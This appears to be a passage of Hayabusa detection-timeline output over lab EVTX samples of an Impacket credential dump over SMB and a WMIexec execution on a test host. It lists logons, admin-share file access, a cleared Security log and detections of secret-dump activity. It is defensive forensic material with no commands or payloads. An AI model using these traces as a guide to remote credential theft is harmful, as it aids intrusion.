+09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 
10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 50078 : LogonID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:14.421 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\BTeHLZkJ.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: 
SYSTEM32\NMdzZfem.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\BTeHLZkJ.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: SYSTEM32\NMdzZfem.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote 
Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:19.875 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:20.003 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File 
Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.560 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret 
dump via SMB.evtx" -2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:22.696 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\Impacket secret dump.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 20:32:00.171 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63558 : LogonID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63534 : LogonID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : 
Port: 50896 : LogonID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 56740 : LogonID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 
0x189fa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.123.11 : Port: 44948 : LogonID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: 
\??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.515 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 
127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619090610.0007844 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 
63564 : LogonID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 
0x18ad10,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63565 : LogonID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63566 : LogonID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63567 : LogonID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:27.649 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 
